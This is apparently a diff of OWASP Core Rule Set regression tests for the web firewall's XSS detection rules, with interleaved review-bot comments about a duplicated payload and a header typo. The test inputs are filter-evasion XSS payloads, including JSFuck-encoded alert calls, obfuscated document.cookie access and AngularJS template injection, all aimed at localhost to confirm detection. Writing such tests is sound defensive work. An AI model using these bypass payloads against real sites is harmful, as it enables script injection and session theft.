"application/x-www-form-urlencoded; charset=us-ascii" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: / + # Reported in https://github.com/coreruleset/coreruleset/issues/1942 as "абвгдеёжзийклнопрстуфхцчшщъыэюя" + data: var=\xd0\xb0\xd0\xb1\xd0\xb2\xd0\xb3\xd0\xb4\xd0\xb5\xd1\x91\xd0\xb6\xd0\xb7\xd0\xb8\xd0\xb9\xd0\xba\xd0\xbb\xd0\xbd\xd0\xbe\xd0\xbf\xd1\x80\xd1\x81\xd1\x82\xd1\x83\xd1\x84\xd1\x85\xd1\x86\xd1\x87\xd1\x88\xd1\x89\xd1\x8a\xd1\x8b\xd1\x8d\xd1\x8e\xd1\x8f 
+ output: + no_log_contains: id "941310" + - test_title: 941310-12 + desc: "Status Page Test - US-ASCII Malformed Encoding XSS Filter Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Content-Type: "application/x-www-form-urlencoded" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: / + data: test=\xbctest\xbetest(\xa2XSS\xa2)\xbc/test\xbe + output: + log_contains: id "941310" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941320.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941320.yaml index ee2f5b67fa..fc08f81e27 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941320.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941320.yaml @@ -1,23 +1,23 @@ --- - meta: - author: "Christian S.J. Peron" - description: None - enabled: true - name: 941320.yaml - tests: - - - test_title: 941320-1 +meta: + author: "Christian S.J. Peron" + description: None + enabled: true + name: 941320.yaml +tests: + - test_title: 941320-1 desc: "XSS Attack - HTML Tag Handler" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - data: "var=\">" - output: - log_contains: id "941330" + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + version: HTTP/1.0 + data: "payload=" + output: + log_contains: id "941330" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941340.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941340.yaml index fc28bc3884..44f60d4598 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941340.yaml 
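Review bot: Test 941310-5's comment states the issue reported `sitzbez\xc3\xbcge`, but the `data` line sends `sitzbez\xc3\x83\xc2\xbcge`, which looks like the double-encoded form (UTF-8 bytes re-read as Latin-1 and encoded again); without an explanation the next maintainer will read the mismatch as a typo. Suggest extending that comment with `# Payload is the double-encoded form of the reported string (ü -> \xc3\x83\xc2\xbc); confirm against the original report`, and the same applies to the `fu\xc3\x83\xc2\x9fmatten` fragment on the same line. Test 941310-12 is also the only stage in the file whose Content-Type omits `charset=us-ascii`; if the rule's match does not depend on the declared charset, a one-line comment on that stage saying so would stop someone "fixing" it back into line with the other eleven.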
+++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941340.yaml @@ -1,39 +1,39 @@ --- - meta: - author: "Christian S.J. Peron" - description: None - enabled: true - name: 941340.yaml - tests: - - - test_title: 941340-1 +meta: + author: "Christian S.J. Peron" + description: None + enabled: true + name: 941340.yaml +tests: + - test_title: 941340-1 desc: "IE XSS Filters - Attack" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - data: "var=' infoo.bar=&var2=whatever" - version: HTTP/1.0 - output: - log_contains: id "941340" - - - test_title: 941340-2 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=' infoo.bar=&var2=whatever" + version: HTTP/1.0 + output: + log_contains: id "941340" + - test_title: 941340-2 desc: "XSS test based on portswigger XSS cheatsheet" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - data: "payload=XSS" - version: HTTP/1.0 - output: - log_contains: id "941340" + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "payload=XSS" + version: HTTP/1.0 + output: + log_contains: id "941340" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941350.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941350.yaml index 7ba9d65399..75721a2ab1 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941350.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941350.yaml 
@@ -1,24 +1,22 @@ --- - meta: - author: fgsch - enabled: true - name: 941350.yaml - description: Test rule 941350 - tests: - - - test_title: 941350-1 - desc: GH issue 1514 - stages: - - - stage: +meta: + author: fgsch + enabled: true + name: 941350.yaml + description: Test rule 941350 +tests: + - test_title: 941350-1 + desc: GH issue 1514 + stages: + - stage: input: dest_addr: 127.0.0.1 method: GET port: 80 - uri: /xx?id=%25252bADw-script%25252bAD4- + uri: /xx?id=%252bADw-script%252bAD4- headers: - Accept: "*/*" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Host: localhost - User-Agent: ModSecurity CRS 3 Tests + User-Agent: "OWASP CRS test agent" output: log_contains: id "941350" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941360.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941360.yaml index bc28995dc9..3f2e77f391 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941360.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941360.yaml 
@@ -1,58 +1,58 @@ --- - meta: - author: "Christian Folini" - description: None - enabled: true - name: 941360.yaml - tests: - - - test_title: 941360-1 +meta: + author: "Christian Folini" + description: None + enabled: true + name: 941360.yaml +tests: + - test_title: 941360-1 desc: "JSFuck / Hieroglyphy payload obfuscation attack" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - data: "a=[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])()" - # Payload represents "alert(1)" in JSFuck encoding - version: HTTP/1.1 - output: - log_contains: id "941360" - - - test_title: 941360-2 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "a=[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])()" + # Payload represents "alert(1)" in JSFuck encoding + version: HTTP/1.1 + output: + log_contains: id "941360" + - test_title: 941360-2 desc: "JSFuck / Hieroglyphy payload obfuscation attack" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - data: "a=(![]+[])[+!+[]]" - # Payload represents "a" in JSFuck / Hieroglyphy encoding - version: HTTP/1.1 - output: - log_contains: id "941360" - - - test_title: 941360-3 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "a=(![]+[])[+!+[]]" + # Payload represents "a" in JSFuck / Hieroglyphy encoding + version: HTTP/1.1 + output: + log_contains: id "941360" + - test_title: 941360-3 desc: "JSFuck / Hieroglyphy payload obfuscation attack" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - data: "a=+!![]" - # Payload represents "1" in JSFuck / Hieroglyphy encoding - version: HTTP/1.1 - output: - log_contains: id "941360" + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "a=+!![]" + # Payload represents "1" in JSFuck / Hieroglyphy encoding + version: HTTP/1.1 + output: + log_contains: id "941360" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941370.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941370.yaml index bf7ab161d5..b1e5f3839f 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941370.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941370.yaml 
@@ -1,172 +1,167 @@ --- - meta: - author: "Andrea Menin" - description: None - enabled: true - name: 941370.yaml - tests: - - - test_title: 941370-1 +meta: + author: "Andrea Menin" + description: None + enabled: true + name: 941370.yaml +tests: + - test_title: 941370-1 desc: "Bypass using comment in syntax and multiple whitespaces" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: GET - port: 80 - data: "a=document+%2F%2Afoo%2A%2F+.+++++cookie" - version: HTTP/1.1 - output: - log_contains: id "941370" - - - test_title: 941370-2 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + data: "a=document+%2F%2Afoo%2A%2F+.+++++cookie" + version: HTTP/1.1 + output: + log_contains: id "941370" + - test_title: 941370-2 desc: "Bypass using comments in syntax" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - data: "a=document%2F%2Afoo%2A%2F.%2F%2Abar%2A%2Fcookie" - version: HTTP/1.1 - output: - log_contains: id "941370" - - - test_title: 941370-3 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "a=document%2F%2Afoo%2A%2F.%2F%2Abar%2A%2Fcookie" + version: HTTP/1.1 + output: + log_contains: id "941370" + - test_title: 941370-3 desc: "Bypass using JavaScript global variables" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: GET - port: 80 - data: "a=window%5B%22alert%22%5D%28window%5B%22document%22%5D%5B%22cookie%22%5D%29" - version: HTTP/1.1 - output: - log_contains: id "941370" - - - test_title: 941370-4 + - stage: + input: + dest_addr: 127.0.0.1 
+ headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + data: "a=window%5B%22alert%22%5D%28window%5B%22document%22%5D%5B%22cookie%22%5D%29" + version: HTTP/1.1 + output: + log_contains: id "941370" + - test_title: 941370-4 desc: "Bypass using JavaScript global variables and comments in syntax" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: GET - port: 80 - data: "a=self%5B%2F%2Afoo%2A%2F%22alert%22%5D%28self%5B%22document%22%2F%2Abar%2A%2F%5D%5B%22cookie%22%5D%29" - version: HTTP/1.1 - output: - log_contains: id "941370" - - - test_title: 941370-5 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + data: "a=self%5B%2F%2Afoo%2A%2F%22alert%22%5D%28self%5B%22document%22%2F%2Abar%2A%2F%5D%5B%22cookie%22%5D%29" + version: HTTP/1.1 + output: + log_contains: id "941370" + - test_title: 941370-5 desc: "Bypass using JavaScript global variables and string concatenation" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: GET - port: 80 - data: "a=self%5B%2F%2Afoo%2A%2F%22alert%22%5D%28self%5B%22document%22%2F%2Abar%2A%2F%5D%5B%22cookie%22%5D%29" - version: HTTP/1.1 - output: - log_contains: id "941370" - - - - test_title: 941370-6 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + data: "a=self%5B%2F%2Afoo%2A%2F%22alert%22%5D%28self%5B%22document%22%2F%2Abar%2A%2F%5D%5B%22cookie%22%5D%29" + version: HTTP/1.1 + output: + log_contains: id "941370" + - test_title: 
941370-6 desc: "Bypass using JavaScript global variables and comments in syntax" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: GET - port: 80 - data: "a=self++%2F%2Ajhb%2A%2F++%5B++%2F%2Abar%2A%2F++%22alert%22%5D%28%22xss%22%29" - version: HTTP/1.1 - output: - log_contains: id "941370" - - - - test_title: 941370-7 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + data: "a=self++%2F%2Ajhb%2A%2F++%5B++%2F%2Abar%2A%2F++%22alert%22%5D%28%22xss%22%29" + version: HTTP/1.1 + output: + log_contains: id "941370" + - test_title: 941370-7 desc: "Bypass using JavaScript global variables and jQuery globalEval" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: GET - port: 80 - data: "a=self%5B%22%24%22%5D%5B%22globalEval%22%5D%28%22alert%281%29%22%29" - version: HTTP/1.1 - output: - log_contains: id "941370" - - - - test_title: 941370-8 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + data: "a=self%5B%22%24%22%5D%5B%22globalEval%22%5D%28%22alert%281%29%22%29" + version: HTTP/1.1 + output: + log_contains: id "941370" + - test_title: 941370-8 desc: "Bypass using JavaScript global variables and hex escape sequence" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: GET - port: 80 - data: "a=self%5B%22%5Cx24%22%5D" - version: HTTP/1.1 - output: - log_contains: id "941370" - - - - test_title: 941370-9 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + data: "a=self%5B%22%5Cx24%22%5D" + version: HTTP/1.1 + output: + log_contains: id "941370" + - test_title: 941370-9 desc: "Bypass trying to access document.cookie using alternative syntax like (document)['cookie']" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: GET - port: 80 - data: "a=%28document%29%5B%22cookie%22%5D" - version: HTTP/1.1 - output: - log_contains: id "941370" - - - - test_title: 941370-10 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + data: "a=%28document%29%5B%22cookie%22%5D" + version: HTTP/1.1 + output: + log_contains: id "941370" + - test_title: 941370-10 desc: "Bypass trying to access document.cookie using alternative syntax and comments like (document/*foo*/)['cookie']" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: GET - port: 80 - data: "a=%28document%2F%2Afoo%2A%2F%29%5B%22cookie%22%5D" - version: HTTP/1.1 - output: - log_contains: id "941370" + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + data: "a=%28document%2F%2Afoo%2A%2F%29%5B%22cookie%22%5D" + version: HTTP/1.1 + output: + log_contains: id "941370" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941380.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941380.yaml index 6da8602f9e..48c4ed5900 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941380.yaml 
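Review bot: Test 941370-5 is described as `Bypass using JavaScript global variables and string concatenation`, but its `data` payload is byte-identical to 941370-4 (`a=self%5B%2F%2Afoo%2A%2F%22alert%22%5D%28self%5B%22document%22%2F%2Abar%2A%2F%5D%5B%22cookie%22%5D%29`), so the concatenation variant the description promises is never exercised and the stage only re-runs the comments-in-syntax check. Either the description or the payload needs to change so the two tests cover distinct cases. Separately, 941370-1 and 941370-3 through 941370-10 send a `data` body with `method: GET`; whether the engine under test inspects a GET body is configuration-dependent, so a short comment stating this is deliberate (or moving the argument into `uri:` as 941380 does) would make the intent explicit.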
+++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941380.yaml @@ -1,26 +1,24 @@ --- - meta: - author: "Franziska Buehler" - description: None - enabled: true - name: 941380.yaml - tests: - - - test_title: 941380-1 +meta: + author: "Franziska Buehler" + description: None + enabled: true + name: 941380.yaml +tests: + - test_title: 941380-1 desc: "AngularJS client side template injection detection" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Accept: "*/*" - User-Agent: "ModSecurity CRS 3 Tests" - method: GET - port: 80 - uri: '/login?user=%20x%20%7B%7Bconstructor.constructor(%27alert(1)%27)()%7D%7D%20.%20ff' - # /login?user={{constructor.constructor('alert(1)')()}} - version: HTTP/1.1 - output: - log_contains: id "941380" + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: '/login?user=%20x%20%7B%7Bconstructor.constructor(%27alert(1)%27)()%7D%7D%20.%20ff' + # /login?user={{constructor.constructor('alert(1)')()}} + version: HTTP/1.1 + output: + log_contains: id "941380" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941390.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941390.yaml new file mode 100644 index 0000000000..fd208ee7f8 --- /dev/null +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941390.yaml 
@@ -0,0 +1,151 @@ +--- +meta: + author: "Franziska Buehler, Xhoenix" + description: None + enabled: true + name: 941390.yaml +tests: + - test_title: 941390-1 + desc: "JavaScript method setInterval(code, 1)" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: '/?arg=setInterval%28code%2C%201%29' + version: HTTP/1.1 + output: + log_contains: id "941390" + - test_title: 941390-2 + desc: "JavaScript method: arg=x\";setTimeout(name, 1)//" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: '/?arg=x%22%3BsetTimeout%28name%2C%201%29%2F%2F' + version: HTTP/1.1 + output: + log_contains: id "941390" + - test_title: 941390-3 + desc: "JavaScript method eval('2 + 2')" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: '/?arg=eval%28%272%20%2B%202%27%29' + version: HTTP/1.1 + output: + log_contains: id "941390" + - test_title: 941390-4 + desc: "JavaScript constructor new Function()" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: '/?arg=new%20Function%28%29' + version: HTTP/1.1 + output: + log_contains: id "941390" + - test_title: 941390-5 + desc: "JavaScript call alert" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: 
localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: '/?arg=alert%28%29' + version: HTTP/1.1 + output: + log_contains: id "941390" + - test_title: 941390-6 + desc: "JavaScript call atob" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: '/?arg=atob%28%29' + version: HTTP/1.1 + output: + log_contains: id "941390" + - test_title: 941390-7 + desc: "JavaScript call btoa" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: '/?arg=btoa%28%29' + version: HTTP/1.1 + output: + log_contains: id "941390" + - test_title: 941390-8 + desc: "JavaScript call prompt" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.>" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: '/get?arg=prompt%28%29' + version: HTTP/1.1 + output: + log_contains: id "941390" + - test_title: 941390-9 + desc: "JavaScript call confirm" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.>" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: '/get?arg=confirm%28%29' + version: HTTP/1.1 + output: + log_contains: id "941390" 
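Review bot: The Accept header in tests 941390-8 and 941390-9 ends in `*/*;q=0.>` while every other test in this file (and the sibling files in this commit) sends `*/*;q=0.5`; the `>` reads as a typo for `5`, although it could also be an artifact of how this page was extracted. If it really is in the file, those two tests send a malformed quality value, and a match on id "941390" could then be accompanied by unrelated protocol-rule alerts, so the tests no longer isolate the rule under test. Suggested value for both: `Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"`. The same two tests also request `/get?arg=` where the first seven use `/?arg=`; worth aligning unless the different path is deliberate.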
diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941400.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941400.yaml new file mode 100644 index 0000000000..80807d767e --- /dev/null +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941400.yaml 
@@ -0,0 +1,119 @@ +--- +meta: + author: "Andrea Menin" + description: None + enabled: true + name: 941400.yaml +tests: + - test_title: 941400-1 + desc: "JavaScript function without parentheses" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: '/?xss=%5B%5D.sort.call%60%24%7Balert%7D1337%60' + version: HTTP/1.1 + output: + log_contains: id "941400" + - test_title: 941400-2 + desc: "JavaScript function without parentheses" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: '/?xss=%5B%20%20%5D%20.%20sort%20.%20call%20%60%20%24%7B%20alert%20%7D%201337%20%60' + version: HTTP/1.1 + output: + log_contains: id "941400" + - test_title: 941400-3 + desc: "JavaScript function without parentheses" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + 